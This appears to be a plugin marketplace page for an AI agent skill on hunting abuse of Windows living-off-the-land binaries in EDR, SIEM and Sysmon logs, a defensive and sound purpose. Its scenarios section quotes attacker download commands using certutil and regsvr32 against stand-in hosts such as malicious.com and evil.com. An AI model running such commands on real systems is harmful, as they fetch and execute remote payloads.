Skill

hunting-for-living-off-the-land-binaries

Hunts abuse of LOLBins like certutil, mshta, rundll32 in EDR/SIEM/Sysmon logs by baselining behavior and detecting anomalies. For proactive threat hunting and evasion detection.

Powershell

security

npx claudepluginhub mukul975/anthropic-cybersecurity-skills --plugin cybersecurity-skills

Tool Access

This skill uses the workspace's default tool permissions.

Preview

- When investigating fileless malware campaigns that bypass traditional AV

Supporting Assets

LICENSEassets/template.mdreferences/api-reference.mdreferences/standards.mdreferences/workflows.mdscripts/agent.pyscripts/process.py

SKILL.md

Similar Skills

applying-brand-guidelines

41.6k

Applies Acme Corporation brand guidelines including colors, fonts, layouts, and messaging to generated PowerPoint, Excel, and PDF documents.

3 files

anthropics-claude-cookbooks

creating-financial-models

41.6k

Builds DCF models with sensitivity analysis, Monte Carlo simulations, and scenario planning for investment valuation and risk assessment.

2 files

anthropics-claude-cookbooks

analyzing-financial-statements

41.6k

Calculates profitability (ROE, margins), liquidity (current ratio), leverage, efficiency, and valuation (P/E, EV/EBITDA) ratios from financial statements in CSV, JSON, text, or Excel for investment analysis.

2 files

anthropics-claude-cookbooks

Stats

Stars5748

Forks783

Last CommitApr 6, 2026

Actions

View Source View Plugin View on GitHub View README

Hunting for Living-off-the-Land Binaries (LOLBins)

When to Use

When investigating fileless malware campaigns that bypass traditional AV
During proactive threat hunts targeting defense evasion techniques
When EDR alerts fire on legitimate binaries executing unusual child processes
After threat intelligence reports indicate LOLBin abuse in active campaigns
During red team/purple team exercises validating detection coverage for T1218

Prerequisites

Access to EDR telemetry (CrowdStrike, Microsoft Defender for Endpoint, SentinelOne)
SIEM with process creation logs (Sysmon Event ID 1, Windows Security 4688)
Familiarity with LOLBAS Project (lolbas-project.github.io) reference list
PowerShell command-line logging enabled (Module Logging, Script Block Logging)
Network proxy or firewall logs for correlating outbound connections

Workflow

Define Hunt Hypothesis: Formulate a hypothesis based on threat intel (e.g., "Adversaries are using certutil.exe to download second-stage payloads from external domains").
Identify Target LOLBins: Select specific binaries from the LOLBAS Project database to hunt for, prioritizing those matching current threat landscape (certutil, mshta, rundll32, regsvr32, msiexec, wmic, cmstp, bitsadmin).
Collect Process Telemetry: Query EDR or SIEM for process creation events involving target LOLBins with unusual command-line arguments, parent processes, or execution contexts.
Baseline Normal Behavior: Establish what legitimate usage looks like for each LOLBin in your environment by analyzing historical frequency, typical parent processes, and standard arguments.
Identify Anomalies: Compare current telemetry against baselines, flagging executions with network connections, encoded commands, unusual file paths, or abnormal parent-child process chains.
Correlate and Enrich: Cross-reference anomalous LOLBin activity with network logs, DNS queries, file creation events, and threat intelligence feeds.
Document and Report: Record findings, update detection rules, and create IOC lists for identified malicious LOLBin usage.

Key Concepts

Concept	Description
LOLBin	Legitimate OS binary abused by attackers for malicious purposes
LOLBAS Project	Community-curated list of Windows LOLBins, LOLLibs, and LOLScripts
T1218	MITRE ATT&CK - Signed Binary Proxy Execution
T1218.001	Compiled HTML File (mshta.exe)
T1218.002	Control Panel (control.exe)
T1218.003	CMSTP
T1218.005	Mshta
T1218.010	Regsvr32
T1218.011	Rundll32
T1197	BITS Jobs (bitsadmin.exe)
T1140	Deobfuscate/Decode Files (certutil.exe)
Proxy Execution	Using trusted binaries to execute untrusted code
Fileless Attack	Attack that operates primarily in memory without dropping files

Tools & Systems

Tool	Purpose
CrowdStrike Falcon	EDR telemetry and process tree analysis
Microsoft Defender for Endpoint	Advanced hunting with KQL queries
Splunk	SIEM log aggregation and SPL queries
Elastic Security	Detection rules and timeline investigation
Sysmon	Detailed process creation and network logging
LOLBAS Project	Reference database of LOLBin capabilities
Sigma Rules	Generic detection rule format for LOLBins
Velociraptor	Endpoint forensic collection and hunting

Common Scenarios

Certutil Download Cradle: Adversary uses certutil.exe -urlcache -split -f http://malicious.com/payload.exe to download malware, bypassing web proxies that allow certutil traffic.
Mshta HTA Execution: Attacker delivers HTA file via email that executes VBScript payload through mshta.exe, which is a signed Microsoft binary.
Rundll32 DLL Proxy Load: Malicious DLL loaded via rundll32.exe shell32.dll,ShellExec_RunDLL to proxy execution through a trusted binary.
Regsvr32 Squiblydoo: Remote SCT file executed via regsvr32 /s /n /u /i:http://evil.com/file.sct scrobj.dll bypassing application whitelisting.
BITSAdmin Persistence: Adversary creates BITS transfer job to repeatedly download and execute payloads using bitsadmin /transfer.

Output Format

Hunt ID: TH-LOLBIN-[DATE]-[SEQ]
Hypothesis: [Stated hypothesis]
LOLBins Investigated: [List of binaries]
Time Range: [Start] - [End]
Data Sources: [EDR, Sysmon, SIEM]
Findings:
  - [Finding 1 with evidence]
  - [Finding 2 with evidence]
Anomalies Detected: [Count]
True Positives: [Count]
False Positives: [Count]
IOCs Identified: [List]
Detection Rules Created/Updated: [List]
Recommendations: [Next steps]